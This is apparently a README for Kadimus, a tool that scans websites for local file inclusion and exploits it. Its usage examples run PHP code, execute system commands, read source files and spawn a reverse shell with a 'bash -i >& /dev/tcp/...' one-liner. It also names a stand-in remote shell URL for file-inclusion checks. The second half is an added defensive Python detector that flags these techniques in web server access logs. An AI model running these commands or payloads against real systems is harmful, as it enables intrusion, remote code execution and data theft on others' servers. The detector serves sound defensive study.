Kadimus is a security tool for detecting local file inclusion (LFI) vulnerabilities in websites.
Features

- Check all URL parameters
- /var/log/auth.log RCE
- /proc/self/environ RCE
- php://input RCE
- data://text RCE
- Multi-threaded scanner
- Command shell through HTTP requests
- Proxy support (socks4://, socks4a://, socks5://, socks5h:// and http://)

Compile
Install libcurl:

CentOS/Fedora
# yum install libcurl-devel

Debian based
# apt-get install libcurl4-openssl-dev

Install libpcre:

CentOS/Fedora
# yum install libpcre-devel

Debian based
# apt-get install libpcre3-dev

Install libssh:

CentOS/Fedora
# yum install libssh-devel

Debian based
# apt-get install libssh-dev

Execute:
$ git clone https://github.com/P0cL4bs/Kadimus.git
$ cd Kadimus
$ make

Options
  -h, --help                    Display this help menu

 Request:
  -B, --cookie STRING           Set custom HTTP Cookie header
  -A, --user-agent STRING       User-Agent to send to server
  --connect-timeout SECONDS     Maximum time allowed for connection
  --retry-times NUMBER          number of times to retry if connection fails
  --proxy STRING                Proxy to connect, syntax: protocol://hostname:port

 Scanner:
  -u, --url STRING              Single URI to scan
  -U, --url-list FILE           File contains URIs to scan
  -o, --output FILE             File to save output results
  --threads NUMBER              Number of threads (2..1000)

 Explotation:
  -t, --target STRING           Vulnerable Target to exploit
  --injec-at STRING             Parameter name to inject exploit
                                (only need with RCE data and source disclosure)

 RCE:
  -X, --rce-technique=TECH      LFI to RCE technique to use
  -C, --code STRING             Custom PHP code to execute, with php brackets
  -c, --cmd STRING              Execute system command on vulnerable target system
  -s, --shell                   Simple command shell interface through HTTP Request
  -r, --reverse-shell           Try spawn a reverse shell connection.
  -l, --listen NUMBER           port to listen
  -b, --bind-shell              Try connect to a bind-shell
  -i, --connect-to STRING       Ip/Hostname to connect
  -p, --port NUMBER             Port number to connect
  --ssh-port NUMBER             Set the SSH Port to try inject command (Default: 22)
  --ssh-target STRING           Set the SSH Host

 RCE Available techniques
  environ                       Try run PHP Code using /proc/self/environ
  input                         Try run PHP Code using php://input
  auth                          Try run PHP Code using /var/log/auth.log
  data                          Try run PHP Code using data://text

 Source Disclosure:
  -G, --get-source              Try get the source files using filter://
  -f, --filename STRING         Set filename to grab source [REQUIRED]
  -O FILE                       Set output file (Default: stdout)

Examples
Scan:
./kadimus -u localhost/?pg=contact -A my_user_agent
./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0

Get file source:
./kadimus -t localhost/?pg=contact -G -f "index.php" -O local_output.php --inject-at pg

Execute PHP code:
./kadimus -t localhost/?pg=php://input -C '' -X input

Command execution:
./kadimus -t localhost/?pg=/var/log/auth.log -X auth -c 'ls -lah' --ssh-target localhost

Also checks for remote file inclusion (RFI) vulnerabilities:
/* http://bad-url.com/shell.txt */

Reverse shell:
./kadimus -t localhost/?pg=contact.php -Xdata --inject-at pg -r -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1' --retry-times 0
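Every technique this README lists (directory traversal into /proc/self/environ or /var/log/auth.log, the php://input and data://text wrappers, and filter:// source disclosure) leaves a recognisable string in the parameter values the target's web server logs. The script below is an added example written for this page from the defender's side; it is not part of Kadimus. It parses combined-format access-log lines, URL-decodes every query parameter (the scanner probes all of them, so the detector inspects all of them too), flags requests carrying those indicators, and then aggregates hits per source IP, since one address touching several techniques within seconds is the footprint of an automated scan. The log lines, addresses and indicator names are constructed for the example.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Indicators taken from the techniques listed on this page: the four
# LFI-to-RCE targets, the filter:// source-disclosure wrapper, and the
# directory traversal that usually precedes them. Names are our own labels.
LFI_INDICATORS = {
    "proc_environ": re.compile(r"/proc/self/environ", re.I),
    "php_input": re.compile(r"php://input", re.I),
    "data_wrapper": re.compile(r"data:(//)?text", re.I),
    "auth_log": re.compile(r"/var/log/auth\.log", re.I),
    "php_filter": re.compile(r"php://filter", re.I),
    "traversal": re.compile(r"\.\.[/\\]"),
}

# Apache/nginx "combined" log format, simplified (no virtual-host field).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log: one source trying several techniques in sequence,
# followed by an unrelated benign request from another address.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /?pg=contact HTTP/1.1" 200 512 "-" "my_user_agent"',
    '203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /?pg=../../../../etc/passwd HTTP/1.1" 200 1024 "-" "my_user_agent"',
    '203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "GET /?pg=php://filter/resource=index.php HTTP/1.1" 200 4096 "-" "my_user_agent"',
    '203.0.113.7 - - [10/Oct/2023:13:55:39 +0000] "POST /?pg=php://input HTTP/1.1" 200 64 "-" "my_user_agent"',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /?pg=/var/log/auth.log HTTP/1.1" 200 0 "-" "my_user_agent"',
    '198.51.100.2 - - [10/Oct/2023:13:56:01 +0000] "GET /?pg=about&id=5 HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]


def decode_params(raw_url):
    """Return [(name, value), ...] for the query string, decoded an extra two
    times so double-encoded payloads (%252e%252e%252f) are still normalised."""
    pairs = parse_qsl(urlsplit(raw_url).query, keep_blank_values=True)
    return [(name, unquote(unquote(value))) for name, value in pairs]


def classify_request(raw_url):
    """Map each parameter name to the list of indicator labels it triggers."""
    hits = {}
    for name, value in decode_params(raw_url):
        matched = [tag for tag, rx in LFI_INDICATORS.items() if rx.search(value)]
        if matched:
            hits[name] = matched
    return hits


def scan_log(lines):
    """Return one finding dict per log line whose parameters carry an indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or foreign line; skip rather than crash
        hits = classify_request(m["path"])
        if hits:
            findings.append({
                "ip": m["ip"],
                "time": m["time"],
                "status": int(m["status"]),
                "path": m["path"],
                "params": hits,
            })
    return findings


def summarize_by_ip(findings):
    """Collapse findings to {ip: sorted indicator labels} so a scanner that
    cycles through techniques shows up as one address with many labels."""
    per_ip = {}
    for finding in findings:
        tags = per_ip.setdefault(finding["ip"], set())
        for matched in finding["params"].values():
            tags.update(matched)
    return {ip: sorted(tags) for ip, tags in per_ip.items()}


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["ip"], f["status"], f["path"], f["params"])
    print(summarize_by_ip(scan_log(SAMPLE_LOG)))
```

The status code is kept in each finding on purpose: a 200 response to a /var/log/auth.log or php://filter request is a stronger signal than a 404, because it suggests the include actually resolved, which is the first thing to triage when the summary shows one address with three or more labels.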